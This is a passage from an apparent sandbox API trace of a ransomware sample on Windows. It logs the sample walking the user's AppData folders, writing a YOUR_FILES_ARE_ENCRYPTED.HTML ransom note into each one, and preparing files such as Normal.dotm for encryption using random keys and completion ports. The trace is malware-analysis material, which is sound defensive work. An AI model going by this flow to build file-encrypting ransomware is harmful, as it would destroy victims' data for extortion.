pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0165.463] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0165.463] WriteFile (in: hFile=0x304, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0165.465] CloseHandle (hObject=0x304) returned 1 [0165.569] GetProcessHeap () returned 0x270000 [0165.570] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0165.571] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="CTLs", cAlternateFileName="")) returned 1 [0165.571] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned 76 [0165.571] GetProcessHeap () returned 0x270000 [0165.571] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0165.571] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0165.571] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*" [0165.571] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0165.571] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.571] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0165.571] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0165.572] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0165.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0165.572] WriteFile (in: hFile=0x304, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0165.574] CloseHandle (hObject=0x304) returned 1 [0165.575] GetProcessHeap () returned 0x270000 [0165.576] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0165.576] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="CTLs", cAlternateFileName="")) returned 0 [0165.576] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.576] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0165.576] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\systemcertificates\\my\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0165.577] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0165.579] CloseHandle (hObject=0x5b8) returned 1 [0165.580] GetProcessHeap () returned 0x270000 [0165.581] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.581] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="My", cAlternateFileName="")) returned 0 [0165.581] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.581] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0165.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 
"c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\systemcertificates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.582] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.584] CloseHandle (hObject=0x5e4) returned 1 [0165.584] GetProcessHeap () returned 0x270000 [0165.585] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.585] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe2d91420, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1e484e0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1e484e0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0165.585] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates") returned 59 [0165.585] GetProcessHeap () returned 0x270000 [0165.585] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.585] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates" [0165.585] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates", lpString2="\\*" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\*" [0165.585] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe2d91420, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1e484e0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1e484e0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.586] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe2d91420, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1e484e0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1e484e0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.586] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf1c7f460, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1c7f460, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1d63ca0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x4611, dwReserved0=0x0, dwReserved1=0x60, cFileName="Normal.dotm", cAlternateFileName="NORMAL~1.DOT")) returned 1 [0165.586] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned 71 [0165.586] 
lstrcmpW (lpString1="Normal.dotm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.586] PathFindExtensionW (pszPath="Normal.dotm") returned=".dotm" [0165.586] lstrlenW (lpString=".dotm") returned 5 [0165.586] PathFindExtensionW (pszPath="Normal.dotm") returned=".dotm" [0165.586] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0165.586] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0165.587] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=17937) returned 1 [0165.587] GetProcessHeap () returned 0x270000 [0165.587] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0165.588] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="EA") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="E8") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="BA") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="17") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="6D") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="08") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="45") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="E2") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="16") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="6C") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd446, 
param_2="%02X" | out: param_1="70") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="55") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="67") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="DE") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="66") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="95") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="1C") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="45") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="C7") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="2A") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="D6") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="29") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="15") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="47") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="E8") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="FE") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="D8") returned 2 [0165.588] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="18") returned 2 [0165.589] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="AE") returned 2 [0165.589] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="92") returned 2 [0165.589] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="D6") returned 2 [0165.589] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="62") returned 2 [0165.589] lstrcpyW 
(in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" [0165.589] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.589] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0165.590] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf1c7f460, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1c7f460, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1d63ca0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x4611, dwReserved0=0x0, dwReserved1=0x60, cFileName="Normal.dotm", cAlternateFileName="NORMAL~1.DOT")) returned 0 [0165.590] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.591] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0165.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\templates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.614] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | 
out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.616] CloseHandle (hObject=0x5e4) returned 1 [0165.630] GetProcessHeap () returned 0x270000 [0165.631] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.633] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89642899, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0165.633] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb26c000, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb26c000, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb26c000, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 1 [0165.633] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word") returned 54 [0165.633] GetProcessHeap () returned 0x270000 [0165.633] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.633] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word" [0165.633] lstrcatW (in: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\*" [0165.634] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb26c000, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb26c000, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb26c000, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.634] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb26c000, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb26c000, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb26c000, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.634] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb26c000, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb26c000, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb26c000, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="STARTUP", cAlternateFileName="")) returned 1 [0165.634] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned 62 [0165.634] GetProcessHeap () returned 0x270000 [0165.634] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0165.634] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" [0165.634] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\STARTUP", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*" [0165.634] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb26c000, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb26c000, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb26c000, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.635] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb26c000, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb26c000, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb26c000, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.635] FindNextFileW (in: hFindFile=0x42f3240, 
